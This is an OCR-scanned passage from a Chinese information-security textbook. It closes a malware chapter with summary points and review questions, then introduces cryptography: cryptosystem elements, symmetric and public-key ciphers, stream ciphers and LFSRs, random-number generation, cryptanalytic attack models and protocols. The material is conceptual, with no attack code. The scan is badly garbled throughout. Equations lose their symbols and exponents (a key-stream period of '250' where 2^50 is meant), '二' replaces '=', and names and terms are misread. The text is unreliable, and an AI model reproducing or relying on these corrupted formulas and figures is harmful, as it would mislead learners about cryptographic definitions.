自动 恢复 .自动 收集 信息 、 智 能 动态 端口 ,传染 等 特性 。 

Rootkit 后 门 按照 内 核 模式 分 为 用 户 级 和 内 核 级 。 僵 尸 网 络 (Botnet) 由 僵尸 主机 
(Zombie) 和 僵尸 网 络 控制 服务 器 两 部 分 组 成 。 僵 尸 C(Bot) 置 于 僵尸 主机 ,是 具有 一 定 智 能 
的 程序 。 

恶意 移动 代码 是 一 种 小 型 程序 ,大 多 艇 入 在 Web 网 页 。 包 括 恶意 浏览 器 脚本 、 恶 意 插 
件 、 恶 意 ActiveX 控件 .恶意 广告 软件 (Adware) 和 间谍 软件 (Spyware) 。 

反 病 毒 技 术 主要 有 特征 值 匹配 、 校 验 和 验证 、 虚 拟 机 仿真 ,启发 式 扫描 ,行为 检测 、 实 时 
监控 ,免疫 等 。 
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和 


oT 


习 题 2 


什么 是 计算 机 病毒 ? 分 为 哪些 种 类 ? 如 何 感染 其 他 程序 ?寄生 方式 有 哪 几 种 ? 
简 述 计算 机 病毒 的 特点 有 哪些 ?计算 机 病毒 发 作 后 的 表现 有 哪些 ? 

脚本 病毒 通过 网 络 传播 有 哪些 方式 ? 

蠕虫 的 工作 原理 是 什么 ?病毒 和 蠕虫 有 什么 区 别 和 联系 ? 

木马 与 后 门 有 什么 区 别 ? 工作 原理 是 什么 ? 

什么 是 线程 注入 技术 ?三 线程 病毒 中 的 远程 线程 有 什么 作用 ? 
什么 是 端口 复 用 ? 反弹 端口 连接 方式 有 哪 几 种 ? 

什么 是 Rootkit 和 僵尸 网 络 ? 与 普通 木马 .病毒 .蠕虫 有 何 区 别 ? 

基于 IRC 的 Botnet 的 工作 原理 是 什么 ? 


.10 什么 是 浏览 器 动 持 ?什么 是 流氓 软件 ? 流氓 软件 具有 哪些 特征 ? 
Ll 


杀毒 扫描 技术 有 哪些 ?特征 码 如 何 选 取 ? 什么 是 启发 式 扫 描 ? 
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密码 技术 是 防止 信息 泄露 的 技术 ,是 信息 安全 技术 中 最 重要 和 最 基本 的 安全 技术 。 由 
于 信息 存储 于 公开 的 地 方 和 非 隐秘 介质 ,信息 的 交换 手段 和 传输 信道 不 安全 ,因此 信息 需要 
使 用 密码 进行 变换 ,从 而 达到 隐藏 秘密 的 目的 。 


3.1 密码 学 概述 


密码 学 是 一 门 古老 而 又 年 轻 的 科学 , 早 在 4000 年 前 , 古 埃及 就 开始 使 用 密码 传递 信息 ， 
近代 历次 重大 战争 更 是 促进 了 密码 技术 的 发 展 。1949 年 ,C.E shannon 发 表 了 “保密 系统 
的 通信 理论 (Communication Theory of Secrecy Systems)”, 为 密码 学 商定 了 坚实 的 理论 基 
础 。 密 码 技术 在 政治 .军事 和 经 济 等 各 个 领域 得 到 了 非常 广泛 的 应 用 ,是 传送 保密 信息 的 主 
要 手段 。 在 现实 生活 中 ,到 银行 存款 或 取款 ,使 用 电话 卡 打 电 话 , 上 网 聊天 都 离 不 开 密 码 , 密 
码 与 我 们 的 生活 密切 相关 。 了 解 一 定 的 密码 技术 对 保障 个 人 财产 和 个 人 隐私 安全 都 有 很 大 
的 帮助 。 

密码 学 是 研究 如 何 实现 秘密 通信 的 科学 ,包括 密码 编码 学 和 密码 分 析 学 两 个 分 支 。 密 
码 编码 学 是 对 信息 进行 编码 实现 信息 保密 性 的 科学 ;而 密码 分 析 学 是 研究 ,分析 \ 破 译 密码 
的 科学 。 


3.1.1 密码 体制 


一 个 密码 系统 (体制 ) 包 括 所 有 可 能 的 明文 、 密 文 、. 密 钥 .加 密 算法 和 解密 算法 。 对 需要 
保密 的 消息 进行 编码 以 隐藏 信息 内 容 的 过 程 称 为 加 密 (Encryption) ,编码 的 规则 称 为 加 密 
算法 (Encryption Algorithm) 。 需 要 加 密 的 消息 称 为 明文 (Plaintext) ,明文 加 密 后 变换 成 不 
容易 理解 的 信息 形式 称 为 密 文 (Ciphertext) 。 将 密 文 恢复 (转换 ) 出 明文 的 过 程 称 为 解密 
(Decryption) ,解密 所 采用 的 一 组 规则 称 为 解密 算法 (Decryption Algorithm)。 加 密 算法 和 
解密 算法 通常 在 一 对 密 钥 控 制 下 进行 ,分 别称 为 加 密 密 钥 和 解密 密 钥 。 密 钥 的 作用 可 以 看 
成 是 日 常生 活 中 使 用 的 钥匙 ,加密 算法 可 以 看 成 是 锁 , 看 似 相同 的 锁 ,必须 用 不 同 的 钥匙 才 
能 打开 。 在 密码 体制 中 引入 密 钥 可 以 提高 加 密 算法 的 安全 性 ,便于 加 密 算法 的 标准 化 和 商 
品 化 。 对 明文 进行 加 密 操作 的 人 员 称 作 加 密 员 或 密码 员 (Cryptographer)。 

一 个 完整 的 密码 体制 (Cryptosystem) 通 常 由 五 要 素 (P,C,K,E,D) 组 成 : 

(1) 明文 空间 P。 表 示 可 能 明文 的 有 限 集合 。 

(2) 密 文 空间 C。 表 示 可 能 密 文 的 有 限 集合 。 

(3) 密 钥 空间 K。 表 示 一 切 可 能 密 钥 的 有 限 集 合 。K = 二 二 K,, Ku 之 ,其 中 天。 表示 加 密 
密 钥 ,K。 表示 解密 密 钥 。 密 码 体制 的 不 同 。 对 应 不 同 的 加 密 密 钥 和 解密 密 钥 。 

(4) 加 密 算 法 下 。 由 加 密 密 钥 控制 下 的 加 密 变 换 的 集合 。 

(5) 解密 算法 D。 由 解密 密 钥 控制 下 的 解密 变换 的 集合 。 
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由 于 密码 的 实用 性 ,必须 要 求解 密 后 的 明文 和 原 明 文 信息 一 样 , 则 有 : 对 任意 &E KK， 
PEP 有 一 个 加 密 算法 eEE 和 相应 的 解密 算法 di ED, 使 得 e(p) 二 c 和 du(c) 一 户 分别 为 
加 密 解 密 函 数 ,满足 di (ei(zx)) 二 x, 这 里 XEP,cEC。 

对 于 一 个 密码 体制 ,由 于 KK 二 二 K.,K4 记 , 则 由 K. 与 Ks 相同 与 否 来 确定 是 否 为 对 称 
密码 体制 。 当 K. 二 Ks 时 ,密码 体制 为 对 称 密码 体制 或 单 钥 密 码 体制 ; 反 之 称 为 非 对 称 密码 
体制 或 双 钥 密码 体制 (Public Key Cryptosystem) 。 在 双 钥 密码 体制 中 ,由 加 密 密 钥 K, 计算 
解密 密 钥 K, 在 计算 上 是 不 可 行 的 ,因而 可 以 公开 K,, 而 不 影响 密码 体制 的 安全 性 。 典 型 
的 加 密 和 解密 过 程 如 图 3. 1 所 示 。 


密 钥 K, 密 钥 K, 


明文 p 


窗 广 明文 
加 密 E ”| 解密 D 二 ~ 


1 


图 3.1 加 密 与 解密 


3.1.2 密码 系统 分 类 


密码 系统 分 类 按照 算法 的 保密 性 可 以 分 为 受 限制 的 (Restricted) 算 法 和 基于 密 钥 (Key- 
Based) 的 算法 。 受 限制 的 算法 保密 性 在 于 保持 算法 的 秘密 ,而 基于 密 钥 的 算法 保密 性 是 在 
于 密 钥 的 保密 。 密 码 系统 的 安全 性 基于 密 钥 保 密 而 非 加 密 和 解密 算法 的 细节 ,这 意味 着 算 
法 可 以 公开 ,甚至 可 以 当成 一 个 标准 加 以 公布 。 

对 于 基于 密 钥 的 算法 ,按照 密 钥 的 特点 分 为 对 称 算法 和 公开 密 钥 算 法 。 

1. 对 称 密码 算法 

对 称 密码 算法 (Symmetric Cipher) 即 传统 密码 算法 (Conventional Cipher) ,就 是 加 密 密 
钥 和 解密 密 钥 相同 , 即 相互 易于 推算 或 实质 上 等 同 。 对 称 密码 算法 又 称 为 秘密 密 钥 算 法 或 
单 密 钥 算法 , 它 要 求 发 送 者 和 接收 者 在 安全 通信 之 前 协商 一 个 共享 密 钥 。 对 称 算法 的 安全 
性 依赖 于 密 钥 ,泄漏 密 钥 就 意味 着 任何 人 都 能 对 消息 进行 加 /解密 。 对 称 算法 按照 明文 的 处 
理 方法 又 可 分 为 序列 密码 ( 流 密码 ) 和 分 组 密码 两 类 。 

(1) 分 组 密码 (Block Cipher)。 将 明文 分 成 固定 长 度 的 组 ( 块 ) ,每 个 分 组 都 用 相同 的 密 
钥 进行 加 密 , 输 出 固定 且 相 同 长 度 的 密 文 。 著 名 的 分 组 密码 包括 数据 加 密 算法 (Data 
EncryptionAlgorithm,DEA, 出 自 IBM, 被 美国 政府 正式 采纳 )、 国 际 数据 加 密 算法 
(International Data Encryption Algorithm,IDEA, 由 苏黎世 ETH 的 中 国学 者 来 学 嘉和 
James L. Massey 开发 ) 和 高 级 数据 加 密 标准 AES-Rijndael 算法 (由 比利时 的 Joan Daenlen 
和 vincent Rijmen 提供 ,被 美国 国家 标准 技术 研究 所 NIST 采用 )。 

(2) 流 密码 (Stream Cipher)。 又 称 为 序列 密码 。 序 列 密码 每 次 加 密 一 位 或 一 字 节 的 明 
文 , 然 后 用 相关 但 不 同 密 钥 加 密 产生 相应 的 密 文 ,相同 的 明文 流 由 于 在 明文 序列 中 的 位 置 不 
同 对 应 不 同 的 密 文 。 序 列 密码 是 手工 和 机 械 密码 时 代 的 主流 。 

2. 公开 密 钥 算法 

公开 密 钥 算 法 (Public-Key Cipher) 又 称 为 非 对 称 密 钥 算法 (Asymmetric Cipher) 或 双 
密 钥 算法 ,其 加 密 密 钥 和 解密 密 钥 不 相同 ,从 一 个 很 难 推出 另 一 个 ,或 者 至 少 在 需求 长 的 时 
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间 内 不 能 推出 。 

公开 密 钥 算法 的 加 密 密 钥 可 以 公开 ,又 称 为 公开 密 钥 (Public Key) ,简称 公 钥 ; 解 密 密 
钥 必须 保密 ,又 称 为 私人 密 钥 (Private Key) ,简称 私 钥 。 每 个 人 都 能 用 加 密 密 钥 ( 公 钥 ) 加 
密 信息 ,但 只 有 解密 密 钥 ( 私 钥 ) 的 拥有 者 才能 解密 信息 。 

公开 密 钥 算法 主要 用 于 加 密 / 解 密 、 数 字 签名 和 密 钥 交 换 等 。 自 从 1976 年 公 钥 密码 的 
思想 提出 以 来 ,国际 上 已 经 出 现 了 许多 种 公 钥 密码 体制 ,比较 流行 的 有 基于 大 整数 因子 分 解 
问题 的 RSA 体制 和 Rabin 体制 .基于 有 限 域 上 的 离散 对 数 问题 的 Diffie-Hellman 公 钥 体制 
和 ElGamal 体制 .基于 椭圆 曲线 上 的 离散 对 数 问题 的 Diffie-Hellman 公 钥 体制 和 ElGamal 
体制 .基于 背包 问题 的 Merkle-Hellman 体制 和 Chor-Rivest 体制 .基于 代数 编码 理论 的 
MeEliece 体制 .基于 有 限 自动 机 理论 的 公 钥 体制 等 。 这 些 密码 体制 有 的 只 适合 于 密 钥 交换 
或 签名 ,有 的 只 适合 于 加 密 /解密 。 


3.1.3 序列 密码 与 随机 序列 数 


1. 序列 密码 

序列 密码 一 直 是 军 方 和 政府 使 用 的 主要 密码 技术 之 一 。 它 的 主要 原理 是 通过 伪 随 机 序 
列 发 生 器 产生 性 能 优良 的 伪 随 机 序列 ,使 用 该 序列 与 明文 信息 流 逐 位 异 或 得 到 密 文 序列 ,所 
以 ,序列 密码 算法 的 安全 强度 完全 决定 于 伪 随 机 序列 的 好 坏 。 伪 随机 序列 发 生 器 是 指 输入 
真 随机 的 较 短 密 钥 ( 种 子 ) ,通过 某 种 复杂 的 运算 产生 大 量 的 伪 随 机 位 流 。 

序列 密码 算法 将 明文 逐 位 转换 成 密 文 。 该 算法 最 简单 的 应 用 如 图 3. 2 所 示 。 密 钥 流 发 
生 器 输出 一 系列 比特 流 : Ki,K,,K;,,*,K,. 密 钥 流 跟 明文 比特 流 P,P;,,P;,*,P.; 进行 
异 或 运算 ,产生 密 文 比特 流 : C; 二 P;@DK;。 

解密 时 , 密 文 从 模型 输入 端 流 入 ,输出 端 流出 的 就 是 明文 ; 密 文 流 与 完全 相同 的 密 钥 流 
异 或 运算 恢复 出 明文 流 : P; 二 CK;。 


密 钥 序列 
产生 器 


密 钥 序 列 : 大, Ky, …, K; 


明文 : PP», ,Pi ———— 
CFPOK; 
图 3.2 序列 密码 模型 


对 于 一 个 序列 ,如 果 对 所 有 的 i 总 有 K; 十 g 王 K;, 则 序列 是 以 g 为 周期 的 ,满足 条 件 的 
最 小 的 g 称 为 序列 的 周期 。 密 钥 流 发 生 器 产生 的 序列 周期 应 该 足够 长 ,如 250。 

利用 移 位 寄存 器 产生 伪 随 机 序列 是 产生 好 的 序列 密码 的 主要 途径 之 一 。 一 个 反馈 移 位 
寄存 器 由 移 位 寄存 器 和 反馈 函数 两 部 分 组 成 。 移 位 寄存 器 的 长 度 用 位 表示 ,如 果 是 ” 位 长 ， 
称 为 n 位 移 位 寄存 器 。 移 位 寄存 器 每 次 向 右 移动 一 位 ,新 的 最 左边 的 位 根据 反馈 函数 计算 
得 到 , 移 位 寄存 器 输出 的 位 是 最 右边 的 最 低位 。 

如 果 移 位 寄存 器 的 反馈 函数 是 b1 ,5 ,…,b, 的 线性 函数 , 则 称 为 线性 反馈 移 位 寄存 器 
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(Linear Feedback Shift Register,LFSR) 。 此 时 反馈 函数 是 对 寄存 器 中 某 些 位 的 简单 异 或 。 
例如 , 某 3 级 LFSR 的 反馈 函数 为 (5b, ,5b ,bs) 二 bi 外 bs ,寄存 器 初始 值 为 (1,0,0) ,产生 的 密 
钥 流 KK 二 0011101… ,周期 为 7。 可 以 证 明 在 已 知 明文 的 攻击 下 ,对 于 级 线性 反馈 移 位 寄 
存 器 ,只 需要 知道 2" 个 明文 密 文 对 就 可 以 确定 密 钥 流 。 

序列 密码 设计 的 方法 归纳 起 来 有 4 种 , 即 系统 论 方法 、 复 杂 性 理论 方法 .信息 论 方法 和 
随机 化 方法 。 将 同步 流 密码 的 密 钥 流 生 成 器 分 解 成 驱动 部 分 和 非 线 性 组 合 部 分 ,这 样 做 不 
仅 结构 简单 ,而 且 便于 从 理论 上 分 析 这 类 生成 器 。 具 体 提 出 了 非 线性 组 合生 成 器 , 非 线性 滤 
波 生成 器 和 钟 控 生 成 器 等 多 种 设计 方法 ,提出 了 构造 布尔 函数 的 多 种 设计 准则 ,如 相关 免疫 
性 、 线 性 结构 .严格 雪 前 特性 .扩散 特性 ,平衡 性 , 非 线 性 性 和 差分 均匀 性 等 。 

序列 密码 的 安全 性 度量 指标 有 线性 复杂 度 轮廓 . 跃 复 杂 度 .K- 错 误 复 杂 度 ( 球 复杂 度 )、 
球 周期 . 非 线性 复杂 度 等 多 种 度量 序列 随机 性 和 稳定 性 的 指标 。 在 序列 密码 的 分 析 方 法 方 
面 ,提出 了 分 别 征服 攻击 方法 、 线 性 攻击 方法 、 线 性 伴随 式 攻 击 方法 、 线 性 一 致 性 攻击 方法 、 
快速 相关 攻击 方法 ,线性 时 序 逻 辑 双 近 方法 和 炉 漏 分 析 方 法 等 多 种 有 效 的 分 析 方 法 。 

2. 随机 序列 与 随机 数 

随机 序列 主要 应 用 于 序列 密码 ( 流 密码 )。 序 列 密码 的 强度 完全 依赖 于 序列 的 随机 性 和 
不 可 预测 性 。 

随机 数 是 较 短 的 随机 位 序列 ,在 密码 学 中 也 是 非常 重要 的 ,主要 应 用 于 数字 签名 、 消 息 
认证 码 .加 密 算法 、. 零 知 识 证 明 .身份 认证 和 众多 的 密码 学 协议 。 

随机 序列 分 为 真 随机 序列 与 伪 随 机 序列 ,随机 数 分 为 真 随机 数 和 伪 随 机 数 。 

真 随机 序列 从 真实 世界 的 自然 随机 性 源 产 生 , 办 法 是 找 出 似乎 是 随机 的 事件 ,然后 从 中 
提取 随机 性 ,如 自然 界 中 的 抛 币 。 在 计算 机 中 噪声 可 以 选取 真实 世界 的 自然 随机 性 ,如 从 计 
算 机 时 钟 寄存 器 中 取得 本 机 的 当前 系统 时 间 到 秒 (或 微 秒 ) 级 的 数值 ,测量 两 次 击 键 的 时 间 
间隔 , 相 邻 两 次 鼠标 移动 的 时 间 间 隔 以 及 由 计算 机 硬件 报告 的 鼠标 实际 位 置 等 。 

伪 随 机 序列 用 确定 的 算法 产生 ,不 是 真正 的 随机 序列 。 伪 随机 序列 发 生 器 指使 用 较 短 
的 真 随机 序列 ( 称 为 种 子 )z 扩展 成 较 长 的 伪 随 机 序列 >。 在 密码 学 中 伪 随 机 序列 的 使 用 大 
大 减少 了 真 随机 序列 的 使 用 ,但 不 能 完全 取代 真 随机 序列 的 使 用 (如 种 子 )。 

线性 同 余 发 生 器 是 一 种 速度 很 快 的 随机 数 发 生 器 : 

ki = (ak 十 0) Mod 

其 中 心 是 序列 的 第 i 个 数 , 变 量 a、b、m 是 常数 ,k。 是 种 子 密 钥 。 

密码 学 意义 上 安全 的 伪 随 机 序列 要 求 满足 以 下 特性 : 

(1) 不 可 预测 性 。 敌 对 者 获得 伪 随 机 序列 y 部 分 位 的 信息 不 应 能 预测 到 > 其 他 位 的 信 
息 与 种 子 x 的 信息 。 古 典 的 伪 随 机 序列 发 生 器 不 适合 加 密 应 用 。 如 线性 反馈 移 位 寄存 器 、 
线性 同 余 随 机 数 发 生 器 、 代 数 式 的 二 进 制 展开 等 。 第 一 个 可 证 明 的 安全 伪 随 机 序列 发 生 器 
是 Shamir 提出 的 基于 RSA 函数 求 逆 的 困难 性 ,是 可 证 明 的 安全 伪 随 机 数 (而 非 位 ) 序 列 发 
生 器 。 

(2) 随机 性 。 序 列 {;} 的 伪 随 机 性 是 指 周期 为 p 的 序列 满足 随机 性 统计 检验 。 常 用 的 
统计 检验 是 : 若 p 为 偶数 , 则 0 和 1 的 出 现 次 数 相同 , 均 为 p/2; 若 p 为 奇数 , 则 0 出现 次 数 
为 (p 土 1)/2。 长 度 为 1 的 串 应 占 1/2*( 占 一 半 ) ,长 度 为 n 的 串 应 占 1/2" 等 。 长 度 为 3 的 串 
形 如 0 串 …10001…,1 串 …01110。 
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3.1.4 ”密码 分 析 与 攻击 


密码 分 析 学 是 在 不 知道 密 钥 的 情况 下 恢复 出 密 文中 隐藏 的 明文 信息 。 成 功 的 密码 分 析 
能 恢复 出 明文 或 密 钥 ,也 能 够 发 现 密码 体制 的 弱点 。 

对 密码 系统 进行 分 析 的 尝试 称 为 攻击 。 通 常 可 以 假定 攻击 者 知道 用 于 加 密 的 算法 ,一 
种 可 能 的 攻击 方法 是 对 所 有 可 能 的 密 钥 进行 尝试 ,但 这 种 方法 对 于 很 大 的 密 钥 空间 是 不 现 
实 的 。 因 此 ,攻击 者 必须 依赖 对 密 文 的 分 析 进 行 攻击 ,如 各 种 统计 方法 。 

如 果 能 够 由 密 文 来 确定 明文 或 密 钥 ,或 者 能 由 明文 和 相应 的 密 文 (明文 - 密 文 对 ) 来 得 
出 密 钥 , 则 该 密码 体制 是 可 破译 的 。 如 果 密 码 分 析 者 无 论 拥 有 多 少 密 文 以 及 无 论 用 什么 方 
法 攻击 都 不 能 达成 破译 , 则 称 其 为 绝对 不 可 破译 的 密码 体制 。 绝 对 不 可 破译 的 密码 在 理论 
上 是 存在 的 。 事 实 上 ,破译 的 难度 是 与 同时 代 计 算 能 力 的 发 展 不 可 分 的 。 如 果 有 足够 的 资 
源 ,有 充足 的 计算 设备 ,任何 密码 在 理论 上 都 是 有 可 能 破译 的 。 

1. 密码 体制 的 攻击 方法 

按 攻击 技术 手段 可 分 为 穷 举 攻击 \ 统 计 分 析 攻 击 和 数学 分 析 攻 击 三 种 。 按 分 析 的 数据 
资源 可 分 为 唯 密 文 攻击 (Cipher Text-Only Attack)、 已 知 明文 攻击 (Known-Plain Text 
Attack) .选择 明文 攻击 (Chosen-Plain Text Attack)、 选 择 密 文 攻击 (Chosen-Cipher Text 
Attack)4 种 。 

(1) 穷 举 攻击 。 也 称 为 强力 攻击 或 者 穷 搜 攻击 ,是 指 密码 分 析 者 通过 依次 试 遍 密 钥 空 
间 中 所 有 可 能 的 密 钥 来 获取 明文 的 一 种 手段 。 对 抗 穷 举 攻击 的 方法 则 可 以 增加 密 钥 空 间 ， 
使 穷 搜 密 钥 的 时 间 在 当前 计算 能 力 上 不 可 行 。 

(2) 统计 分 析 攻 击 。 指 密码 分 析 者 利用 密 文 和 明文 的 概率 统计 规律 ,从 而 找 出 符合 规 
律 的 相应 明文 的 方法 。 有 许多 的 古典 密码 都 可 以 采用 统计 分 析 攻 击 ,达到 破译 。 如 历史 上 
的 Casear 密码 ,可 以 通过 统计 密 文 的 单字 母 频率 分 布 , 利 用 英文 文本 的 单字 母 频率 分 布 规 
律 进行 比 对 ,从 而 得 出 相应 的 明 、 密 文 对 应 关系 。 

对 抗 统计 分 析 攻 击 的 方法 是 消除 密 文 中 的 明文 统计 特性 ,去 掉 明文 与 密 文 的 统计 相关 
性 。 通 常 的 一 种 做 法 是 在 加 密 后 的 密 文 中 进行 处 理 , 使 得 密 文 的 分 布 具 有 随机 性 ,消除 统计 
规律 中 异常 的 部 分 。 

(3) 数学 分 析 攻 击 。 即 是 密码 分 析 者 对 密码 特性 中 表现 出 的 数学 特征 ,通过 数学 求解 
的 方法 来 获得 最 后 明文 ,达到 破译 。 如 公 钥 密码 RSA 是 基于 大 合 数 因 式 分 解 的 数学 难题 问 
题 ,目前 破译 的 方法 通常 是 因 式 分 解 的 强力 攻击 。 

对 抗 数学 分 析 攻 击 的 方法 通常 是 选用 坚实 数学 基础 和 足够 复杂 的 解密 算法 ,但 是 对 加 
密 应 用 会 带 来 时 效 低 等 问题 。 增 加 密 钥 空间 仍 是 一 个 抵抗 不 断 增长 的 计算 能 力 的 有 效 方 
法 。 对 于 现代 密码 体制 ,最 基本 的 要 求 则 是 能 够 抵抗 穷 举 攻击 和 统计 分 析 攻 击 。 

(4) 唯 密 文 攻击 。 密 码 分 析 者 对 密码 的 体制 及 相关 信息 都 不 可 知 , 仅 得 到 截获 的 一 些 
密 文 。 这 是 最 不 利于 破译 的 情况 。 即 已 知 Ci 二 Ex (Pi),C; 二 Erk(P,),…,C; 二 Ex(P;), 推 
导出 Pi ,P,… ,了 P;; 密 钥 K; 或 者 找 出 一 个 算法 E 从 Ci 二 Ei(Pi+1) 推 出 P+i。 

(5) 已 知 明文 攻击 。 密 码 分 析 者 知道 一 些 明 文 - 密 文 对 。 这 种 攻击 方法 对 有 明显 数据 
特征 的 明文 而 加 密 的 密 文 攻击 很 有 效 。 即 已 知 Pi ,Ci 二 Ex(P1);P;,C;=Ex(P,);…;P;, 
Ci 二 Ex (Pi) ,推导 出 密 钥 K ,或 从 Cini 王 Ei(Pi+1) 推 出 Pi 的 算法 。 
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(6) 选择 明文 攻击 。 密 码 分 析 者 可 以 选择 一 些 明 文 - 密 文 对 ,这 种 情况 比 已 知 明文 攻击 
更 有 利于 破译 。 即 已 知 P, ,C= Ex (P1);P,,Cs=Exr(P,);"…;Pi,C; 二 Ex(P;), 其 中 Pi， 
P,,…,P; 是 由 密码 分 析 者 选择 的 ,推导 出 密 钥 玉 ,或 从 C1 二 Ei(P;y1) 推 出 Ps 的 算法 。 

(7) 选择 密 文 攻击 。 密 码 分 析 者 可 以 选择 一 些 密 文 ,并 获取 相应 的 明文 ,这 种 是 对 攻击 
者 最 有 利 的 情况 。 即 已 知 Ci ,Pi 二 Dk (C1);C; ,Ps 二 Dx (Cs);…;Ci ,Pi 二 Dxk(C;) ,推导 出 密 
钥 KK。 此 攻击 方法 与 选择 明文 攻击 方法 比较 类 似 ,针对 的 密码 体制 不 同 。 如 对 数字 签名 的 
攻击 适用 于 此 方法 。 

对 于 一 个 密码 体制 ,密码 分 析 者 用 尽 所 有 的 资源 仍 不 能 达到 破译 ,就 是 计算 上 不 可 行 。 

2. 密码 体制 的 安全 性 

1) 密码 体制 的 安全 性 质 

一 个 安全 的 密码 体制 应 该 具备 的 性 质 如 下 : 从 密 文 恢复 明文 应 该 是 困难 的 ,即使 分 析 
者 知道 明文 空间 (如 明文 是 英语 ); 从 密 文 计 算出 明文 部 分 信息 应 该 是 困难 的 ;从 密 文 探测 出 
简单 却 有 用 的 事实 应 该 是 困难 的 ,如 相同 的 明文 信息 被 加 密 发 送 了 两 次 。 

2) 密码 体制 的 攻击 效果 

(1) 完全 攻破 。 敌 手 找到 了 相应 的 密 钥 , 从 而 可 以 恢复 任意 的 密 文 。 

(2) 部 分 攻破 。 敌 手 没有 找到 相应 的 密 钥 ,但 对 于 给 定 的 密 文 能 够 获得 明文 的 特定 
信息 。 

(3) 密 文 识别 。 对 于 两 个 给 定 的 不 同 明文 及 其 中 一 个 明文 的 密 文 ,敌手 能 够 识别 出 该 
密 文 对 应 的 明文 ,或 者 能 够 识别 出 给 定 明 文 的 密 文 和 随机 字符 串 。 如 果 一 个 密码 体制 使 得 
敌手 不 能 在 多 项 式 时 间 内 识别 密 文 ,这 样 的 密码 体制 称 为 达到 了 语义 安全 (Semantic 
Security) 。 

3) 密码 体制 的 安全 性 评价 

(1) 无 条 件 安全 性 。 如 果 密 码 分 析 者 具有 无 限 的 计算 能 力 ,密码 体制 也 不 能 被 攻破 , 那 
么 这 个 密码 体制 就 是 无 条 件 安全 的 。 例 如 只 有 单个 的 明文 用 给 定 的 密 钥 加 密 , 移 位 密码 和 
代 换 密码 都 是 无 条 件 安 全 的 。 一 次 一 密 乱码 本 (One-time Pad) 对 于 唯 密 文 攻击 是 无 条 件 安 
全 的 ,因为 敌手 即使 获得 很 多 密 文 信息 ,具有 无 限 的 计算 资源 ,仍然 不 能 获得 明文 的 任何 信 
息 。 如 果 一 个 密码 体制 对 于 唯 密 文 攻击 是 无 条 件 安全 的 , 称 该 密码 体制 具有 完善 保密 性 
(Perfect Secrecy) 。 

(2) 计算 安全 性 。 密 码 学 更 关心 在 计算 上 不 可 破译 的 密码 系统 。 如 果 攻 破 一 个 密码 体 
制 的 最 好 算法 用 现在 或 将 来 可 得 到 的 资源 都 不 能 在 足够 长 的 时 间 内 破译 ,这 个 密码 体制 被 
认为 在 计算 上 是 安全 的 。 

目前 还 没有 任何 一 个 实际 的 密码 体制 被 证 明 是 计算 上 安全 的 ,因为 攻破 一 个 密码 体制 
的 当前 已 知 算法 也 许 并 不 是 最 好 的 攻击 算法 ,可 能 还 存在 一 个 没有 发 现 的 更 好 的 算法 。 实 
际 上 ,密码 体制 对 某 一 种 类 型 的 攻击 (如 蛮 力 穷 举 攻击 ) 是 计算 上 安全 的 ,但 对 其 他 类 型 的 攻 
击 可 能 是 计算 上 不 安全 的 。 

(3) 可 证 明 安全 性 。 另 一 种 安全 性 度量 是 把 密码 体制 的 安全 性 归结 为 某 个 经 过 深入 研 
究 的 数学 难题 。 例 如 ,如 果 给 定 的 密码 体制 是 可 以 破解 的 ,那么 就 存在 一 种 有 效 的 方法 解决 
大 数 的 因子 分 解 问题 ,而 因子 分 解 问题 目前 不 存在 有 效 的 解决 方法 ,于 是 称 该 密码 体制 是 可 
证 明 安全 的 , 即 可 证 明 攻 破 该 密码 体制 比 解决 大 数 因子 分 解 问题 更 难 。 可 证 明 安全 性 只 是 
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说 明 密 码 体制 的 安全 与 一 个 问题 是 相关 的 ,并 没有 证 明 密 码 体制 是 安全 的 ,可 证 明 安全 性 也 
称 为 归 约 安全 人 性 。 


3.1.5 密码 协议 


所 谓 协 议 , 就 是 两 个 或 者 两 个 以 上 的 参与 者 为 完成 某 项 特定 的 任务 而 采取 的 一 系列 步 
又 。 协 议 的 特点 : 协议 自始至终 是 有 序 的 过 程 , 每 一 个 步骤 必须 执行 ,在 前 一 步 没有 执行 完 
之 前 ,后 面 的 步骤 不 可 能 执行 ;协议 至 少 需要 两 个 参与 者 ;通过 协议 必须 能 够 完成 某 项 任务 。 

密码 协议 (Cryptographic Protocol) 是 使 用 密码 学 完成 某 项 特定 的 任务 并 满足 安全 需求 
的 协议 。 安 全 协议 (Security Protocol) 是 以 密码 学 为 基础 的 消息 交换 协议 ,其 目的 是 在 网 络 
环境 中 提供 各 种 安全 服务 。 协 议 的 参与 者 可 能 是 完全 信任 的 人 ,也 可 能 是 攻击 者 和 完全 不 
信任 的 人 。 常 用 的 密码 协议 包括 密 钥 建立 、 分 配 与 交换 ,认证 等 几 种 。 

用 单独 的 密 钥 对 每 一 次 单独 的 会 话 加 密 ,这 个 密 钥 称 为 会 话 密 钥 。 密 钥 建 立 协议 的 作 
用 是 在 两 个 或 者 多 个 实体 之 间 建 立会 话 密 钥 。 协 议 可 以 采用 对 称 密码 体制 ,也 可 以 采用 非 
对 称 密码 体制 。 有 时 通过 一 个 可 信 的 服务 器 为 用 户 分 发 密 钥 , 称 为 密 钥 分 发 协议 ;也 可 以 通 
过 两 个 用 户 协商 建立 会 话 密 钥 , 称 为 密 钥 协商 协议 。 

认证 协议 是 认证 进入 计算 机 系统 的 用 户 或 客体 的 身份 是 否 授权 或 合法 ;认证 消息 的 完 
整 性 、 真 实 性 和 可 用 性 等 ,防止 假冒 攻击 。 如 电子 投票 .电子 货币 支付 等 协议 。 

对 密码 协议 的 攻击 包括 直接 攻击 协议 中 的 密码 算法 、 实 现 技术 以 及 协议 本 身 等 。 如 果 
密码 算法 和 实现 技术 都 是 安全 的 ,协议 本 身 的 安全 最 重要 。 首 先是 设计 安全 ,而 设计 与 协议 
的 使 用 目标 、 应 用 环境 、 攻 击 者 的 攻击 模型 和 水 平 有 关 , 对 主动 攻击 ( 重 放 与 破坏 ) 和 被 动 攻 
击 ( 侦 听 ) 都 必须 有 足够 的 防御 能 力 。 因 此 ,安全 协议 本 身 的 正确 性 . 宛 余 性 ,安全 性 是 重要 
的 研究 课题 。 


3.2 对 称 密 码 


对 称 加 密 算 法 ,有 时 又 叫 传统 密码 算法 , 它 的 典型 特点 是 解密 算法 就 是 加 密 算 法 的 逆 运 
算 或 者 完全 相同 ,加密 密 钥 和 解密 密 钥 相同 或 可 相互 推算 出 来 ,如 古典 密码 。 

现代 对 称 加 密 算 法 可 分 为 两 类 , 即 分 组 密码 和 序列 密码 (或 流 密 码 ) 。 对 称 密码 的 典型 
代表 是 现代 分 组 加 密 算 法 ,如 DES( 数 据 加 密 标准 ) IDEA( 国 际 数据 加 密 算法 ) 和 AES (高 
